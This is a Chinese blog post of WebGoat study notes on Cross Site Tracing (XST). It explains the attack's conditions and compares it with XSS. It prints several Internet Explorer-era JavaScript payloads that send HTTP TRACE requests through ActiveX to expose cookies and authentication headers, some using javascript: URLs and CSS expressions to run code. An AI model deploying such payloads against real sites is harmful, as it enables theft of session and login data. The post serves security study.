WebGoat学习笔记(六)——Cross Site Tracing(XST) Attacks

本文介绍了XST(跨站跟踪)攻击的基本概念、实现手法及利用条件。XST是一种通过恶意代码收集受害者敏感信息的安全威胁,它能绕过HTTP验证及NTLM验证。文章提供了具体的攻击代码示例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

JS Post Url

  

<script type="text/javascript">if ( navigator.appName.indexOf("Microsoft") !=-1) {var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("GET", "./", false); xmlHttp.send();str1=xmlHttp.responseText; document.write(str1);</script>

 

JS Trace

 

<script type="text/javascript">if ( navigator.appName.indexOf("Microsoft") !=-1) {var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE", "./", false); xmlHttp.send();str1=xmlHttp.responseText; while (str1.indexOf("/n") > -1) str1 = str1.replace("/n","<br>"); document.write(str1);}</script>

 

 

cross-site tracing XST攻击

以下来自

http://huaidan.org/archives/285.html

XST攻击描述:
攻击者将恶意代码嵌入一台已经被控制的主机上的web文件,当访问者浏览时恶意代码在浏览器中执行,然后访问者的cookie、http基本验证以及ntlm验证信息将被发送到已经被控制的主机,同时传送Trace请求给目标主机,导致cookie欺骗或者是中间人攻击。

XST攻击条件:
1、需要目标web服务器允许Trace参数;
2、需要一个用来插入XST代码的地方; 
3、目标站点存在跨域漏洞。

XST与XSS的比较:
相同点:都具有很大的欺骗性,可以对受害主机产生危害,而且这种攻击是多平台多技术的,我们还可以利用Active控件、Flash、Java等来进行XST和XSS攻击。
优点:可以绕过一般的http验证以及NTLM验证

如何利用:

手法1:
<SCRIPT type=text/java script>
<!--
function xssTRACE(){
var xmlHttp=new ActiveXObject(/"Microsoft.XMLHTTP/");
xmlHttp.open(/"TRACE/",/"
http://wmjie.51.net/swords//",false);
xmlHttp.send();
xmlDoc=xmlHttp.responseText;
alert(xmlDoc);
}

//-->
</SCRIPT>
<BR><INPUT onclick=xssTRACE(); type=button value=/"XSS TRACE/">

手法2:
<SCRIPT type=text/java script>
<!--
function xssTRACE() {
var openWin=open(/"blank.htm/",/"swords/",/"width=500,height=400/");
var otraceswords=openWin.external;
openWin.location.href=/"
http://wmjie.51.net/swords//";
setTimeout(
function () {
//以下必须写在一行
otraceswords.NavigateAndFind('java script:xmlHttp=new ActiveXObject(/"Microsoft.XMLHTTP/");xmlHttp.open(/"TRACE/",/"
http://wmjie.51.net/swords//",false);xmlHttp.send();xmlDoc=xmlHttp.responseText;alert(/"不用document.cookie 显示站点wmjie.51.net/swords/ 的头信息。//n/" + xmlDoc);',/"/",/"/");
},
1024
);
}
//-->
</SCRIPT>
<BR><INPUT onclick=xssTRACE(); type=button value=/"XSS TRACE/">

手法3:
<SCRIPT type=text/java script>
function xssTRACE(){
var swords = /"var xmlHttp = new ActiveXObject(//"Microsoft.XMLHTTP//")/;xmlHttp.open(//"TRACE//",//"
http://http://www.tingh.com///",false)/;xmlHttp.send()/;xmlDoc=xmlHttp.responseText/;alert(xmlDoc)/;/";
var target = /"
http://wmjie.51.net/swords//";
spinach = encodeURIComponent(swords + ';top.close()');
var readyCode = 'font-size:expression(execScript(decodeURIComponent(/"' + spinach + '/")))';
showModalDialog(target, null, readyCode);
}
</SCRIPT>
<BR><INPUT onclick=xssTRACE() type=button value=/"XSS TRACE/">

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值